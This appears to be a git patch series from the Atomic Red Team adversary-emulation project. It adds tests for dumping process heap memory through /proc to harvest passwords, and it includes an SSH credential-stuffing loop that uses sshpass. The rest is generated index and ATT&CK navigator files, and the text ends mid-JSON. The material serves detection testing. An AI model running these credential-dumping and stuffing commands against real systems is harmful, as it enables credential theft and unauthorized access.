[Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | | | | | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 686e91a6..9cb1ac61 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -4865,7 +4865,106 @@ credential-access: x_mitre_is_subtechnique: true x_mitre_platforms: - Linux - atomic_tests: [] + identifier: T1003.007 + atomic_tests: + - name: Dump individual process memory with sh (Local) + auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to + copy process memory to an external file so it can be searched or exfiltrated later. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007.bin" + script_path: + description: Path to script generating the target process + type: Path + default: "/tmp/T1003.007.sh" + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + dependencies: + - description: 'Script to launch target process must exist + +' + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) + MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) + MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) + MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) + dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" + grep -i "PASS" "#{output_file}" + cleanup_command: 'rm -f "#{output_file}" + +' + - name: Dump individual process memory with Python (Local) + auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 + description: | + Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to + copy a process's heap memory to an external file so it can be searched or exfiltrated later. + supported_platforms: + - linux + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "/tmp/T1003.007.bin" + script_path: + description: Path to script generating the target process + type: Path + default: "/tmp/T1003.007.sh" + python_script: + description: Path to script generating the target process + type: Path + default: PathToAtomicsFolder/T1003.007/src/dump_heap.py + pid_term: + description: Unique string to use to identify target process + type: String + default: T1003.007 + dependencies: + - description: 'Script to launch target process must exist + +' + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: 'Requires Python + +' + prereq_command: "(which python || which python3 || which python2)\n" + get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" + +' + executor: + name: sh + elevation_required: true + command: | + sh #{script_path} + PID=$(pgrep -n -f "#{pid_term}") + PYTHON=$(which python || which python3 || which python2) + $PYTHON #{python_script} $PID #{output_file} + grep -i "PASS" "#{output_file}" + cleanup_command: 'rm -f "#{output_file}" + +' T1606.002: technique: external_references: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md new file mode 100644 index 00000000..a23a5e9c --- /dev/null +++ b/atomics/T1003.007/T1003.007.md @@ -0,0 +1,134 @@ +# T1003.007 - Proc Filesystem +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007) +
Adversaries may gather credentials from information stored in the Proc filesystem or /proc. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. + +This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.
+ +## Atomic Tests + +- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local) + +- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local) + + +
+ +## Atomic Test #1 - Dump individual process memory with sh (Local) +Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to +copy process memory to an external file so it can be searched or exfiltrated later. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| +| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| +| pid_term | Unique string to use to identify target process | String | T1003.007| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sh #{script_path} +PID=$(pgrep -n -f "#{pid_term}") +HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1) +MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1)))) +MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2)))) +MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START))) +dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE" +grep -i "PASS" "#{output_file}" +``` + +#### Cleanup Commands: +```sh +rm -f "#{output_file}" +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Script to launch target process must exist +##### Check Prereq Commands: +```sh +test -f #{script_path} +grep "#{pid_term}" #{script_path} +``` +##### Get Prereq Commands: +```sh +echo '#!/bin/sh' > #{script_path} +echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} +``` + + + + +
+
+ +## Atomic Test #2 - Dump individual process memory with Python (Local) +Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to +copy a process's heap memory to an external file so it can be searched or exfiltrated later. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| +| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| +| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py| +| pid_term | Unique string to use to identify target process | String | T1003.007| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sh #{script_path} +PID=$(pgrep -n -f "#{pid_term}") +PYTHON=$(which python || which python3 || which python2) +$PYTHON #{python_script} $PID #{output_file} +grep -i "PASS" "#{output_file}" +``` + +#### Cleanup Commands: +```sh +rm -f "#{output_file}" +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Script to launch target process must exist +##### Check Prereq Commands: +```sh +test -f #{script_path} +grep "#{pid_term}" #{script_path} +``` +##### Get Prereq Commands: +```sh +echo '#!/bin/sh' > #{script_path} +echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} +``` +##### Description: Requires Python +##### Check Prereq Commands: +```sh +(which python || which python3 || which python2) +``` +##### Get Prereq Commands: +```sh +echo "Python 2.7+ or 3.4+ must be installed" +``` + + + + +
From 17eab72057d9638af27f6dea73636933db9010c2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 19:45:25 +0000 Subject: [PATCH 23/35] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1110.004/T1110.004.yaml | 2 ++ atomics/used_guids.txt | 2 ++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index 29d8c304..0c408431 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml @@ -4,6 +4,7 @@ display_name: 'Brute Force: Credential Stuffing' atomic_tests: - name: SSH Credential Stuffing From Linux + auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad description: | Using username,password combination from a password dump to login over SSH. @@ -33,6 +34,7 @@ atomic_tests: for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done - name: SSH Credential Stuffing From MacOS + auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b description: | Using username,password combination from a password dump to login over SSH. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 55f9ed27..f60266d0 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -716,3 +716,5 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 8fd5a296-6772-4766-9991-ff4e92af7240 7e91138a-8e74-456d-a007-973d67a0bb80 437b2003-a20d-4ed8-834c-4964f24eec63 +4f08197a-2a8a-472d-9589-cd2895ef22ad +d546a3d9-0be5-40c7-ad82-5a7d79e1b66b From 1f69c7fb087a3256e763e106a5888dc40cb222fa Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 19:45:31 +0000 Subject: [PATCH 24/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 4 +- .../Indexes/Indexes-Markdown/linux-index.md | 3 +- .../Indexes/Indexes-Markdown/macos-index.md | 3 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/macos-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 67 +++++++++- atomics/T1110.004/T1110.004.md | 115 ++++++++++++++++++ 14 files changed, 198 insertions(+), 10 deletions(-) create mode 100644 atomics/T1110.004/T1110.004.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 836c4f9a..969f8c8f 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 23c8d246..018c33c7 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true}